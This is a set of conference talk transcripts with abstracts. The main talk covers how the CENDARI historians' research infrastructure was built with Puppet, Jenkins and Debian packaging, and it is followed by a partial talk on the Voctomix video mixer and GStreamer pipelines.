Kododojo startet. Was? Du willst meine Kinder stehlen? Nein, das ist ein großer Arm. Nein, wir reden später. Cool. Du? Essen. Ich glaube, es gibt noch keine Essen. Du musst starten. Mach es. Stefan, wer ist? Ich könnte jemanden mit dir connecten. Komm mit mir, nach dem Gespräch. Vielleicht kann er von Essen kommen. Vielleicht. Okay, das ist es. Cool. Dann danke dir für das Gespräch. Es hat ein Erfolg, einmal zum projeto
|
CoderDojo is a worldwide initiative to teach kids how to program. Each one is organized individually and the organizer can choose how to do it. I will show you what we do at our Dojo in Cologne and share tips on how to organize a Dojo :)
|
10.5446/32445 (DOI)
|
Okay, hello everybody, good morning. I may welcome you to the first talk today. And this is a science track. This is a new feature on the Frostconn. We want to have more science related talks. And this is the first one in this series. And I may introduce to you Mr. Karsten Thiel. He's a mathematician and he has studied in Göttingen. Yes, Göttingen. And he made his PhD in Magdeburg. And he's now in Niedersachsen at the Staats-Universitätsbibliothek in Göttingen. And he is there at the supporting science work, especially the non-technical science. And so we are very interested in your talk. Thank you. Thank you. Okay, so I want to talk about our endeavors into research infrastructures. Thiel already said I'm working in IT infrastructure in digital humanities at the State University Library in Göttingen. And what I'm presenting here is what we did in the Cendari project, where we did technology work together with the French Research Institute in Ria, King's College in London, the Serbian Academy of Sciences, us at the SCP Göttingen, and Trinity College in Dublin, so rather international group of IT people. The project ran from 2012 to 2016 under funding by the European Commission. Research infrastructures, as defined by the European Commission, refers to facilities, resources, and related services used by the scientific community to conduct top-level research in their respective fields. So in our case, that means web services, web interfaces that users can use to advance their research. Distributed, in this sense, means that we have components that are running at different institutions, that are connected through either APIs or at least through centralized user authentications so that users can switch from one application to the other and continue working on their data. In the humanities, we have a high variety of research questions from historians, which is the main focus group of this talk, of this project, to people working on literature studies, languages, and so on. And there are lots of special purpose solutions for every single one of those questions, research questions, research problems. And there's a strong focus on word processing. So quite a lot of what they do, they do it in Microsoft Word. And one problem that this project was trying to address is access to resources that are held at various cultural heritage institutions, archives, libraries, and so on. Sandari is a project that built a virtual research environment targeted at historians. The term was originally an inquiry environment for research into historian studies. One aim was to integrate existing resources, existing sources around Europe, enabling access to so-called hidden archives. Many archives are still not accessible. Well, their contents are not accessible through the internet. Very often, even the archives themselves don't have web pages where you can find much information about them. So they are very hard to find stuff that you want for your research. And one traditional problem of a historian is he's traveling to some place in the next month to visit a content source. And so what he would like to know is, is there an archive in the area that has something that relates to my research problems? And while I'm there, I could go to that archive and look at that material. And that is really a hard problem still to find out what archives there are and what they actually have in terms of content. Fostering transnational access. So again, it's a European project. So we're working together collaboratively around Europe. And one idea also is to have people from one country go to other countries and find resources there. The project had 14 partners from eight European countries. Among them, Humanities Scholars, Computer Scientists, Cultural Heritage Institutions themselves, Archives Libraries. And we had two main focus areas. One was World War I. The other one was Medieval Research, which are quite different from the other. Which are quite different from all of the content and questions they have. And also from the material available. So in medieval research, you have one page. That's a lot. Whereas for the first World War, you even have videos and things like that available sometimes in the archive. Very often, not digitally. This is one view and what the application can do in the end. On the left, you have your project tree. And in the middle, the text you're working on, which can be a transcript of a document from an archive, a scan, an image that you have. And what you see in the colors are results of the named entity recognition applied automatically and then edited by the researcher. The colors indicate people, places, places are blue. People are red. And you see the list of people here. You can highlight them. If you hover over these bars, then they pop up here. You have, it's not that visible, but this is a map where you see the places that's currently selected on the map. And people can share these projects with each other. We're collaboratively on them. And at some point, maybe even decide to make it available publicly. And it's all happening in the web browser. From the technical side, it looks a bit different. That's what we've been focused on. I'll explain this in a few minutes. So I set the project grand for four years. And first, I'm going to tell you how we started out. And then I'm going to tell you how we tried to fix some of the problems we had. We started out with one virtual machine where everyone was playing around. Everyone had access. Everyone had Zudo rights. Everyone did what they thought was the best idea, which didn't work that well because everyone was interfering with everyone else. Someone broke one config and nothing else worked. So we started to have more machines. Every team had their own machine playing around. It caused less interference, but things started to grow apart. Also, there was a long trial and error phase. Many, many different things were tried out, installed, removed, or partially removed, or just abandoned, and left running for months or years. We also did manual EAD encoding. EAD is a standard for archival description. That's an XML standard. So people were manually writing, and when I say people, I mean historians, scholars, they were manually encoding XML files, tracking them in SVN. So they first had to learn how to write an XML file. Then they had to learn how to use SVN. They did use oxygen. Sorry, not open source. So things that happened was that they wanted to have an object with two IDs. Oxygen said, no, you can only have one ID on an element in this XML file. But, well, the historian's no better. They want two IDs, which led to lots of problems later when we tried to actually parse those files and make them available in the interface. There was also a phase where we tried semantic media wiki as an editing software, because, well, it's media wiki, which is basically Wikipedia. Everybody knows and uses Wikipedia, so that's easy. And also, it's semantic, so we got all these super great semantic features. Yeah, well, that doesn't work automatically. It's no magic. You have to actually do something. And that was more complicated than what was originally hoped. So I said things grew apart. We had slas machines, ubuntu machines, and debian machines. We had a slas machine with a debian change route, because you know that one package that isn't available for slas, but debian, and it's easier to install a debian change route and then install the package from there, because upgrades and all. But no one was doing upgrades in the debian change route, because all those people who were doing upgrades to the system package didn't even know there was a debian change route on there where to look into. So it was basically the same as installing from source. We had applications installed from packages. We had applications compiled manually, directly on the server. Again, things that people once did, completely forgot about it, never wrote it down, never told anyone else, left the project. And in terms of standards, well, installing from source, usually, we had applications installed from standards, well, installing from source, usually, that doesn't give you automatic backup routines and things like that, even packages don't usually get you automated backup routines. So in its scripts, we're missing when servers were rebooted for various reasons, power outage in the data center or whatever, where we had to write an email to that one developer who knew how to start that more database on that development server. And there were lots of experiments. So one example is this is the actual URL they started to use for the reference to this schema file with an IP address hardcoded in it. Yeah, that's not very sustainable. And that became a problem even before the end of the project because we switched IPs for some reason. Collaboration, well, we had kind of shared responsibility. One was responsible for the one server, and the other one was responsible for the other server. But in terms of the application, it was not so clear when we started putting them together. So at first, there were several silos, several applications, all working on their own. But we needed to combine them, and that started to cause problems because everyone was so very different. Again, documentation incomplete, sometimes lacking. Big risk of silos and knowledge loss, in particular knowledge loss because it's a research project where many of the people at least that are paid to work on the project, usually the advisor who's a professor at some institute, he is not exactly paid by the project because he has his salary, but then he has the grant money to pay his PhD students who sometimes finish their PhD and then leave, or even leave without finishing the PhD. So sometimes in the middle of the project, the one developer who knew something has suddenly gone to SAP. And then it takes two weeks to actually find the source code he wrote. So we looked at something else, DevOps, the big buzzword, clipped compound of development and operations, a culture of movement, a culture or movement or practice that emphasis collaboration and communication, while automating the process of software delivery and infrastructure changes. That's what the English Wikipedia says. So important are collaboration, communication, and at the same time automation. And that's what we tried to use to fix at least some of the problems we had. So when you have a research project across Europe with people from, I said, France, Britain, Germany, Serbia, and then they're working people who are from yet different countries, you have all those cultural clashes in terms of how you work, what you think you should do or not. And all of those teams were working independently because we're not a company that has one goal or something. There's researchers who have their research projects and one of those projects is this Sendari project. And the goal is to get something that works so that we can show it to the European Commission in some sense. Of course, everyone wants there to be something that people can use that has an added value. But at the same time, the one thing you get paid for it is to deliver something that's presentable to the funder, no matter how great it is. If the funder, the most important thing is that the funder approves of the result because then you get another grant for the next project. So you have to have impact for your project to be valuable, but impact is not measured in the same sense as it is with big companies. Going back to the DevOps word, so what we did was include the building of the architecture into our agile development processes, which the teams had individually started to use. And we tried to combine them together into one process. And we also defined this infrastructure in some sense. So what this picture shows is the front end applications. Then we have in the middle our API layer that connects all the front end applications to all the back end applications which basically came down to two back end applications from originally six because we realized we don't need that many. And then at the bottom layer, you have things like databases and storage. And these are the core components. And these are some externally hosted services. I said it's a distributed infrastructure, so we have external services that are not part of this infrastructure that existed before we started creating this. And it exists independently. So one is this red box here, the nerd, which does the named entity recognition and disambiguation. It's hosted by the French Inria developers. And we're only accessing that through an API. But these are all hosted internally. And you can switch between the applications. What are those applications? We have ATEM. It's an open source PHP application. It stands for Access to Memory. It's a standard application from the Open Archive Initiative that's used to encode archival descriptions where people can enter, well, there's an archive. This is the address. And this is what they have in terms of content. You can describe this. And what it puts out are those standard EAD files that we first tried to manually edit with an XML editor. Sinkhan is a Python-based repository software where all our data gets in. We have half a million data sets, or a bit more than that, in there that were mostly harvested directly from archives through Open Standards if it's actual content. So we have descriptions on item level, which means there's this image which shows that person held at this archive. But we also have more global things that just basic textual description of an archive and their holdings. This main application, NTE, Note-Taking Environment, which was the image I showed you, it's forked from an application that's called Editors Notes, Python based on Django. Then we have our very own application, the LITF Conductor. That's the main backend component that does all the transformations. And we have Pineapple, which is a browser for the triple store. We have an OpenVirtuoso triple store in the backend. And this is the browser for that knowledge base. We're using MySQL, ProSqrace, Redis, Elasticsearch, Open Virtual. So what we needed was a lot more communication, a lot of automation. And as I said, we're not talking about scale. So we didn't need hundreds of those servers. Many times when you introduce automation, you need many servers. What we were interesting was defined state and reproducibility. And what we tried to do in order to get more communication was shorten prints, more releases. We went from, well, maybe one thing every six months to more or less weekly. We had weekly sessions with the developers and the historians who were using the current version of the software, talking about current issues, what were the next steps to fix something to get closer to what the application was supposed to do. It was possible to directly create tickets directly from the application so that developers could say, well, this is just failed for that and that reason. We introduced config management. We chose one Ubuntu version. So it was two years ago, so we chose Ubuntu 14. We chose Puppet for config management. We set up a staging and a production environment. Both managed through Puppet. We used Jenkins to build the software. And when I say build with PHP, well, there's still some processing of the CSS files, SAS files, static files. And then we packaged everything as Debian files with FPM because they were very easy to version in terms of Puppet. You easily know which version you have installed. You can easily go back to an older version if you need to. And we did this even for static files like the documentation because it's just the easiest way to deploy your software. So what's it look like? We have the developer with his laptop who then pushes his changes to GitHub, which then trigger a build in the Jenkins server, which creates the Debian package, puts it in aptly Debian repository, and then we install it on the server. The server is managed by Puppet, for which we have our internal Chilli project code hosting. And from that, you can create a vagrant machine on your local laptop again, which looks, well, identical to the production system with the obvious differences of data of things like passwords, host names, certificates. But up to that, it's identical. And you can also test your software against latest version from other people locally if you want to, or you can just deploy them, push your changes to GitHub. It will go through the staging environment. I'll explain that in a moment. We had lots of mostly virtual meetings because all across Europe, it's very expensive to get people together, so mostly Skype sessions. Everything went into version control, the code for the infrastructure. Everyone had access to everything. So still, every single developer was able to change the production Puppet code, was able to look into the server, manually do changes, which then cause different problems. But they learned that it was not a good idea. We had automated builds and tests upon code push. We installed our applications from one app repository. The infrastructure and the applications were developed together because this image I showed you of how the infrastructure looked like. This is like the 10th iteration. Before that, we had much more backend applications. Things were moved around between in this image, there's actually two front at the front office server and the back office server, which hold two different parts of the stack. Things were moved around. All these changes happened simultaneously to the changes to the application. And also on the second level, whenever we had a new version of a tool deployed, we could also change, for instance, its config file or things like that simultaneously with the change of the tool. We had the Vagant machine. We had the staging and the production systems, and they all were basically identical except for data, which is very important because if you have a triple store with a few hundred thousand triples and a triple store with a few billion triples, they behave very differently. Its elastic search is much more flexible in that respect, for instance, over databases. Yeah, I said it several times. We had two environments, the staging and the production environment. They were created by two different branches in our puppet git repository, which means we had one staging branch. We first tried our changes there. When we were satisfied with the changes, we merged that into the production branch, and then those changes went into the production systems. Our package repository actually had two, as it's called, components. The Jenkins uploaded the Debian packages always in the staging component, and that's what the staging server used to install the packages. It always installed the latest package available from that component or branch of the repository. And we wanted to deploy something to production. We just copied the Debian package from one part of the repo to the other, and then the production server would get that version too. Yeah, that allowed for coordinated changes, new version of a component, and changes to its config file. They all happened together. Some things we learned. Very nice is the reproducibility. We are now able to recreate the entire server from scratch if we need to, or if we want to. And if we need a test instance, that something puppet can do, it's not the case any longer that we need that one person who knows how to deploy that one piece of software who is unfortunately on extended sick leaves and will only be back in a month, so everyone has to wait for him to return to continue work on the project. In scientific terms, reproducibility of your software stack is very important. We have a defined state of the software, of the server, of the configuration. In some sense, this is provenance data on the infrastructure. It's, of course, not entirely complete, because depending on what level of provenance you need, it's very important which version of which library you have installed, which we don't manage to that extent. So if you install an Ubuntu 14 today, there are differences to the Ubuntu 14 from two years ago. Well, the biggest thing is OpenSSL, which had quite a few changes over the years with drastic results, which are probably not that important to the applications that we're using, but still it's big changes in the infrastructure that we are not entirely managing here. We had shared ownership in the sense that most developers don't really care about all those OpenSSL problems and which cipher order you are implementing on the server and the NTP config and what your firewall settings exactly are. The best firewall settings is everything's open, because then the developer can access everything and do what he wants. But they still want to change something in their applications config file, add a setting for a new feature, things like that. And everyone was able to do that. And puppet bath practices can help a lot there. There is a talk about that tomorrow, I believe. And so we were able to share these things. So developers didn't have to care about SSL ciphers, and they were able to set up their things themselves. And one thing is that the security settings like firewall and so on, they are important right from the start even before you have all the user data in there. Because otherwise you end up in a situation where you never thought about it and then you have all the user data and suddenly you realize that you have big holes somewhere. Which is also something you have to care of. Config management, it causes a lot of overhead. It's harder to set up a server with config management than it is to just to up get install and be happy with it. You have to rethink how you work with your systems, because you no longer SSH into the server to make a change. You make the change in your puppet code that gets into the, you check that in with Git, then it gets deployed. And then hopefully the thing you want it to happen will happen. In some sense, it's a new programming language you have to learn. And by you, I also mean system administrators who usually don't consider themselves developers. And now they have to do programming. Also in the sense that they have to use Git and workflows like branching, because I said we had two branches mapping to the different environments. And so changing that one setting and that one file becomes much more complicated. Of course, now you're changing all the servers. So if it's only two servers, maybe it's faster to do it by hand. But apart from that research infrastructure, we have more of them. And so NTP settings and things like they're identical in all. And if we want to change them on 40 servers, that starts to get more complicated than just doing it, when you're just doing it by hand. And also, puppet and most conflict management systems also, they will undo what you did manually. So if the developer SSH is into the system and just changes a setting, or if the admin does it, just SSH into the system, changes small setting to make something work, puppet will revert that on its next run. And then it's broken again. So this led to some friction. People were afraid of the automation, because they never knew what will happen next. Well, of course, we knew what it was going to do. But the thing is that you can't oversee the whole puppet code unless you're actually working on it all the time. And when you're using configuration management like with puppet, then you don't end up with the defaults. For example, the Ubuntu defaults in some settings. Because the puppet defaults are a bit different sometimes. And this can cause problems when you think, well, I just saw the package, and then everything works. Because with the default setting in the Ubuntu package, it works. But not with the default setting that gets pulled in through puppet. It won't work. Things like that happened and took us some time to trace. And of course, always it's the problem with the automation, because the automation does things it's not supposed to do. But the other thing is also some sort of automation. The Ubuntu default, which is different from the Sless default, may not be the best setting either. Also the complaint that it's far too early to put everything into config management. You can use config management very well to configure NTP, firewalls, Apache settings. But it's far too early to decide where the config file lives, what's in the config file, things like that. It's far better to do that in the end, like when you have two days before the end of the project, then we can think about this. And I mentioned this before for system administrators. They usually don't see themselves as developers. So learning GitHub adds overhead there. One thing I've heard several times is I don't know how to code well. I'm too embarrassed to show my code on GitHub. I can't possibly publish my little shell script that does something, because it's just hacked together in a few seconds. The other fear is that if we publish our configuration, everyone know how we set up everything in every exact detail, and they will find all the attack vectors that we overlooked, which is not entirely wrong. But on the other hand, if you know what you're doing, and if you look at many other. So if you know what you're doing, that's still a problem. But many people do it anyways, because many of these things you can find out if you know what you're looking for as well. And there are, so I said also that our puppet code isn't actually on GitHub for everything. For most of the configuration management, we're using an internal Git repository, which doesn't grant everyone access to it. Others do this. So the United Kingdom government has all of its puppet code completely available on GitHub. Well, obviously, except for passwords and certificates and stuff like that. How we did puppet code, though this is more puppet specific. First, we tried some custom abstractions, which basically model this image of our infrastructure that I showed you. We had these definitions of the front end machine and the back end machine. And on that were the components, our software that we installed, and they, on turn, relied on the resources like databases, Elasticsearch. And if we decided to switch one component from one role, from the back end to the front end or something, we just had to change one line. And we had one module, in terms of a puppet module, that we shared with the other research infrastructures we have, which sets up things like passwords and certificates, firewalls, and so on. But that's how to migrate once the project ends, because now you have two completely different Git repositories. And you want to put all of this together. You want to make a change to things like the SSL site first, because latest problems. Then you still have to go in and change it in several Git repositories, which still causes overhead. So we change that into what the standard is in terms of puppet now. We have basically one puppet module that's on GitHub, which you can use to install the Sundari applications. Of course, it relies on our internal app repository, which is available publicly, and it's open source and reusable. And we have these shared roles and profiles, which is the puppet standard that we can use among all our projects. And through those, we pull in the SSL site first, firewall settings, and so on. Yeah, a bit on sustainability. As I said, one problem is that the project only runs for four years. Once the project is over, everyone moves on to their next research project, and people leave. But then now you have this application, hopefully running. In the case of Sundari, we have about 1,000 users a month, which is a lot for a research application in the humanities. Now there are people who are using it. And there's data in there. So you have to keep installing software updates, package updates, security updates to be sure that everything will continue working and that everything is still secure. You have to maybe look at the code to fix something. And this is why we think, at least to some extent, this will help. It won't help us if there's a problem with the actual applications that our developers program. But it will at least give us some way of fixing things. I mean, those are Python PHP applications. If in two years' time we decide we have to move to a new operating system version, it's probably possible to recompile them on the new version and reinstall it on the new system. So the hope is that this will enable us to get that stage as well. But before that, at least we now have a centralized application, which is integrated into our other projects. One of them is called Daria, the Digital Research Infrastructure for the Arts and Humanities. It's a large European project that tries to sustain some of these projects, some of these infrastructures, keep them alive, keep installing security updates, monitor them if something breaks, like storage has disappeared, reboot the machine. And if it's really broken, decide on whether or not there are enough users to decide and invest some people time to go in and update things. And this became much easier with this aligned config management, where we had basically the very same layout, and we had to know where to look if we wanted to change something. We did this for Sandari and also for TechSquid, which is a German research infrastructure for literature research. Well, to come to the end, it does cost a lot of time initially, a lot of friction we also experienced. But later it paid off, because one thing we had was this feature of trusted automation. So we have one bug fixed in staging, and there's half an hour before this big workshop with 30 international historians coming in, and they all want to see how great the software is. But there's this one critical bug. We really need to get it down. Well, it's working in staging, so let's just deploy it to production, because the last 30 times it worked as well, and that time it did as well. So that was one of the good end results. And with that, I'm open to questions. Yeah? So the question was on the, we don't have a mic, so I'm repeating, the question was on named entity recognition and what training parameters we have and how to implement them. And with the puppet configuration, so the thing is that the named entity recognition is happening outside, so it's not managed by our puppet code. Inria is still developing that. They originally did some training with Wikipedia texts, which are a bit different from text that historians write. So what they then started working on was, so the interface has two steps. You click on a button and the automated named entity recognition runs through it, and then you can go in and fix the entities and decide, well, this is actually not a place, it's a person, or this is a person you forgot. And that gets then fed back into the named entity recognition to improve the results. But in terms of the parameters, I mean, if it's contents of, so in theory, if it's contents of a configuration file that doesn't have to change dynamically, then you can manage it with puppet. If it's something that changes dynamically over time, then you can't change it with puppet. So puppet always gives you access to the configuration, but not to the data. It's really hard to manage the data. So also what our puppet code not does is to, if you set up a new server, it will not initialize any databases. You have to do that. There are scripts, and it deploys the scripts to do that, but you have to manually decide to do it. Yeah? Doesn't that just say that it has changed in saving time? or other entities to enjoy this? Yeah. Would you just manage this? Or would you just want to work with this project? Yeah. So first question is a bit more on the change in mindset and the second was on putting this to different locations, different setups. Maybe on the second, we have not yet of both of those. I said we have two infrastructures like this now, TechSquid and Sendari. We always have one of those, but in theory it's possible to set it up again. And with TechSquid, we are in fact in discussion with a group from Switzerland on exactly that because they really want to keep their stuff in Switzerland and not on servers in Germany. In many cases, it's still easier to put it on servers that are at a university somewhere in Europe than to put it on Amazon AWS for instance, but it's still in sometimes politically important to have it in your own country. Changing the mindset. The problem is that it's very easy. You always know what you're changing in your config files. Sometimes you have installed your applications several times for your databases several times on that specific version of an operating system and you just look in, you know exactly what the file is, you just write something in there and then you're done. The problem that arises here is, I said we have two staging environments and they ask differences like what password they use or which database they use, where the server lives. And so you have to have ways to say, well, depending on if this code is applied on that server or on that server, it's different. And these abstractions is what makes it complicated to change something. You want to change one setting that's the same everywhere. That's probably very easy because you just open the file and write it in there. But if it depends on which server you're actually deploying the thing on, then you have put in variables that are then realized on the server depending on the host name for instance, which creates a lot of overhead. And that caused a lot of friction because it was much more complicated to change something. And also once someone decided on something, well, that was it. And so they were like, well, the code is all on GitHub, you can install it. There's a basic installation instructions which included the make file, which to compile static files required me to have an elastic search instance running with the correct elastic search index set up because on a production server that's anyway the case. So that's not a problem. And also in your development machine, you need that. But you don't need it on a Jenkins server. You just want to compile the static files. And this causes a lot of friction because you have to change how you're working. You can't just have one single make target that does everything. You need one specific make target to create the static files that don't have dependencies on things you don't really need to compile the static files. And then in terms of deploying that package that you create on the Jenkins server to your actual production server, you have changes. At first we had a Jenkins server that ran on Debian. And there's also some node applications in there and node lifts, well, I'm not entirely sure, but userlib and userbin and slug, just bin somewhere, there's a difference between Ubuntu and Debian and that caused broken links and things like that. So these things are hard. And that took a lot of time initially. But as I said, it paid off in the end because it was easier to get a new version into production. No one was afraid to actually deploy that thing just half an hour before the workshop. That literally happened. Keeping the��고 framework in the first one. So Jenkins did run the tests if they were in, sorry, I'm repeating the question. If we're using automated tests, we're using automated tests. If the script you run in Jenkins or the Maven target includes testing, then it will be run. But, well, the standard problem was it was way more important to finish the product than to finish the tests, which will cause us a lot of problem if someone has to go in and actually change something. Yeah. But during the project, it was more like the developer changed something, it worked on his machine, he deployed it to staging, it worked on staging. And he was sufficiently confident to push it to production. Yes? Why did you use so many different operating systems? Initially, yeah. Well, in the end we did. Originally, so the thing is we're using, why we're using different operating systems in the first place. So basically every team got their machine and they did what they wanted. That was how this happened. And the SLAS came in because of the University Center Center we're using, that was their default. So they gave us SLAS machines, some people reinstalled it with the different operating systems, others didn't. That's how we ended up with the Debian change route on one of them. Yes? Acceptance, yeah. Yeah. Yeah. Okay, so acceptance by humanities researchers. So most of the development was done by computer scientists. Together with the researchers who joined us in those weekly test sessions who did the actual testing, they did not so much work on GitHub. What they did was we originally had a JIRA instance where they were tracking. I said we had these data from these archives in our repository and that they had to go to those archives, talk to them, to let them allow us to have them into our database. And there were agreements signed and so on. And this they tracked from the beginning with JIRA. They had specifically, JIRA has this workflow engine where you can do things like that. So first step was person goes out to the institute. Once this is all done, the ticket gets moved on to the project coordinator who has to sign the paperwork with this archive. Then it goes on to the developer who does the actual harvesting of the data from them. And when I said we have the ticket system directly in our application, that was also originally the JIRA ticketing system. In the end, we put our tickets on GitHub because we no longer use JIRA. And people, in that case, people needed to have GitHub accounts there to create the issues. But those three who were still creating issues when the project was basically over, they kept doing that as well. But it was a hard process. Also we had in the beginning when they were forced to use SVN, well, they did it. And they were manually encoding XML files. So when I joined the project and I learned that we had historians who had no idea what they were actually trying to do with those XML files, why they were just being told, well, it has to be this XML file. It has to be this standard. And then you have this validator. Well and then things happened like ignoring validator remarks like you can only have one I.D. Yeah, thank you. Go ahead.
|
Distributed Research Infrastructures are built to support scholars from various disciplines in their work. In the case of CENDARI, a toolset aimed at historians has been developed with support by the European Comission. We will explain how popular open source solutions like Jenkins and Puppet have been employed in building the infrastructure, which is composed of open source applications, both existing and specifically developed.
|
10.5446/32448 (DOI)
|
Herzlich willkommen bei den Nachmittagssessions von der Froscon 11. Wir fangen jetzt ziemlich pünktlich an mit Voktomix, einem Tool, was hier selbst auf der Froscon auch eingesetzt wird, nämlich um die ganzen Streams und Aufnahmen zu machen. Mastermind ist in dem Fall auch wirklich das Mastermind von der Software. Er wird jetzt die Software ein wenig erklären, ein wenig über sich, über die Anforderungen und das Ganze auch auf Englisch machen, damit auch international gesehen werden kann, was hier auf der Froscon alles gemacht wird, damit die ganzen Streams funktionieren und damit das Ganze auch aufgenommen werden kann. Bühne frei für Mastermind. Hi, thank you. Thank you very much. As you said, I'm Mastermind. I'm part of the C3Voc. We are doing conference recordings, especially on the Congress, but also on some smaller conferences and on the Froscon, of course. And yeah, I would like to talk to you about Voktomix. Voktomix is our live vision mixer or live video mixer, as we call it. And it's specially designed around the needs of C3Voc, but I'm sure it will suit a lot of use cases of talk recordings. And yeah, but we designed it around the needs of our use case. And as you may have seen, you're sitting inside of one of our setups. Behind there is the camera. We have a mixer operator there, Framgraber here, Beamer and audio systems here. And a lot of stuff around here. And because it's so much, I would like to talk you through some of the pieces and parts that are part of our setup and that together form the requirements we have to our vision mixer and that in the end formed what Voktomix is. I will just talk about the core system Voktomix and the presentation mixing. We have a whole pipeline after that for post-processing and encoding. And last year there was a pretty nice talk from Peter and Meiser and you can watch that on MeteorCCCTE and there you can see all the remaining pieces of our pipeline, which are also awesome. So in the beginning there is a camera and there is the public. And we want to transport the video of the camera to the public. It's simple. But maybe there is another camera and maybe there is a speaker and maybe there is audio. Yeah, of course. And maybe there is also some, oh, there is a speaker. But maybe there is also some play out like here the confidence screen I have, I see my slides here. And of course we want recording too. Because just streaming to the public is good, but having it recorded for later use is even better. But there are not always talks. Sometimes there is nothing in the room. And we do not want to stream an empty room. Or even worse, people standing somewhere here and having a chat and we are streaming that live to the internet. That wouldn't be good. So we might need some kind of pause of break loop that we send out when there is no talk. And if it's just video, people will think, hey, my speakers are broken. So we need some kind of music source. And yeah, there is presenters and there is projectors. And we want to maybe show the slides there. But maybe we want also to show the cameras there. If speakers present hardware or something on the stage and it is small, you might want to see it here. And there is also some kind of things where we are not really thinking about what we could also do if we have all this video information in one system. Where can we stream it too? And we maybe deliver it to another room if the room gets full or something. So in the middle, there is the presentation mixer. And it's what combines all these inputs and outputs and puts the right things in the right places to the right times. But we are not the first one to do this. Are we? No. So there is professional hardware. There is things you can buy that just work. Maybe. So, buy them, you switch them on and you pay around 2000 euros for such a device. But it's just a device. It doesn't have controls. So you need a control panel, which costs you around 5000 euros. Or you need software, which is not so easy to use because it looks like this. And you have to use it with a mouse. And it's not easy and it has a lot of buttons and it has a lot of functions. And people who were doing video mixing on the Congress know that we tape most of these Buttons because you can accidentally hit them and then the world burns. So we have another idea of what we want to do. We want our solution to be open source. It should be as open source as possible. And it should be software. Why should it be software? We could also design hardware. Well, we want to run it on commodity hardware. You should be able if something breaks around here. If the notebook behind there goes poof. We can go to the next conhardt and buy a new notebook or maybe borrow yours and have it running within half an hour. And we have a running room setup. We want to have it on commodity hardware so we can expand easier. We can just say, okay, you have a fast computer, bring it over, we will use it. It's no problem. And we want it to be replicable. For two reasons. First reason, something might break. As I said, if one of our main encoder systems die, because the power brick is gone, we can go to the next conhardt and just buy a new power brick and put it in there and it will work because it's just a PC. It has some special hardware, but in the end it's just a PC. And it should be replicable so that other groups can replicate what we are doing without buying special hardware that they may just not need in another year. So we have, for example, talked a lot to people in Australia, to the Picon Australia group or to the Linux Connau people. And they said, hey, we like your setup. We have built the same thing here. So on the other side of the world, people replicated our setup. And that's pretty, pretty cool. And that's what we want to do. And that's because it's the reason we want to use software to do that. So if you're looking into how to do live video mixing or live vision mixing in software on Linux, there are a few options. There's SlipRV, FFM-Pack, and of course, there's GStreamer. And GStreamer seems, on the first view, like a perfect fit. It has a lot of the functionalities we need already, existing. It is modular. It is plug-alive. We will take an in-depth look to GStreamer in a second. It's modular, you can take a piece out and put another piece in. And it's a completely different thing. It runs maybe on the GPU or on some specialized hardware, but the inputs and outputs are the same. You can just replace any component with other components. And we use GStreamer as the basis, as the framework to build Voktomics. And because it is so important to know how Voktomics is built, because in the end it's not that complicated, if you take a look at it, I want you to go with me on a ride and we will step through how Voktomics is constructed in the inner, with a not so in-depth, but a look that should give you an idea how you can modify it, if it doesn't work for you. So to do that, let's take a look at GStreamer. GStreamer is a pipeline-based multimedia framework. So they say. You build a pipeline, like something goes in, and it goes through some filters, and it goes out again. Here we see a video test source. It generates a test video. Then there is an image sync in the end, which puts it to the X-server. And in between I have a filter that says, okay, I will only let pass video that is this high and this wide. So what now happens is that GStreamer tries to negotiate between the source and the sync. It tries to find a format that both parties are capable of handling and that satisfies the filter requirements in between. So video test source will say, oh, I can produce a video in any resolution you want. And X-Image sync will say, oh, I can take nearly any resolution you want, maybe up to 4,000 by 4,000 pixels. So GStreamer knows, okay, I can now produce any resolution I want up to 4,000 by 4,000 pixels. And then it tries to apply the filter on it and says, okay, I now have to restrict the possibilities to those given values. But I have freedom in other things. Like, for example, will I send RGB data or will I send it in the other way around, blue, red, green, or blue, green, red? So it's up to those both systems to decide which they can produce and which they can accept. Also I'm not making a statement about the frame rate. So video test source will say, okay, I can produce every frame that you want, but I would prefer 25. And GStreamer tries to negotiate between the source and the sync and find a way to satisfy all needs. And if it can't, it will fail. And if it can, it will build your pipeline and start it. And the pipeline is basically a threat where the source gives the timing. Video test source produces frames into speed at things it should. And the frames are running through the pipeline to other elements. Video test source could produce frames as fast as it can. But XimgStream says, okay, I have a screen and my screen is running at 60 frames, so I can consume 60 frames. And it will only take as many frames as it can. And just as with Unix files, the slower sync does backfrager the source. And the source starts to run just as fast as it needs to to satisfy the requirements of the sync. That is a little complicated if we talk about. But in most cases will just work. You set the source, you set the sync, and it just works. The GStreamer does the hard things for you, all the negotiation in between. To take a look at all the things I just said, here is the introspection of the video test source plugin. We see all the formats it can produce. Multiple video formats. There's RGBX, like a bit red, a bit green, a bit blue, and a bit padding to align to 32 bits. There are video style formats, which are not RGB, but another color space. And the list is long. And it also can produce video from one pixel up to some big number. And it also can produce nearly any frame rate you want. So this is just what I said. GStreamer will need to negotiate between all these capabilities and all these properties of a video stream. Let's take a look at a little more complicated pipeline. I now have two sources. There's the video test source. And there's an audio test source. Now I have two independently running sources, both produce video and audio. I now have two pipelines running, basically. And in both pipelines, there are multiple constructs. But let's talk through that from the bottom up. But because it makes it easier, let's take a look at this element. It's a MOOCs. It takes multiple inputs and arranges them into a single stream. In this case, it makes an mp4 file. It takes multiple streams, and it puts them into an mp4 file. We have two encoders here. 264 encoder and mp3 encoder. So each of the sources, we put them through an encoder, and they take raw audio on the in or raw video and put encoded video out on the outside. And we take these two halves and put them into the MOOC and we get a working mp4 file in this case. But there are multiple elements here that I didn't talk about. There are these Q elements. And the reason for that is that we are actually building threads here. Each of these sources is an independently running thread. And the MOOC needs to synchronize between them. So what will happen is, let's say, the MOOC says, OK, I need one second audio for one frame. Maybe it is like that. So the audio test source will produce one audio sample. And the video test source will produce one frame. And the MOOC says, OK, I can't do anything. I have enough audio samples. So the audio test source will try to wait until the MOOCs can take the samples. But the MOOCs says, OK, I can't do anything. Please go on and continue. I have to wait until the video frame is there. So they both block each other because they're waiting for each other, because they don't run in the same speed. The audio source runs 48,000 times a second. And the video source only 25 times a second. So I need a way to adapt these two speeds. And this is what the Qs are for. They are essentially thread boundaries. So everything before the Q is a thread. And everything after the Q, like the MOOC, is a different thread. And because of the setup, all three things can run as fast as they want. And the Qs try to accomplish this back pressure and say, OK, please don't run too fast. But I have to give the data on to the MOOC. And this is one of the complicated things in G-Streamer. This is where it doesn't just work or it doesn't always just work. You plug your sources and your encoders and your MOOCs together and expect it to work and it doesn't. It just blocks. And they say, OK, I can't write file. The time is just not incrementing. And the reason is that you have to 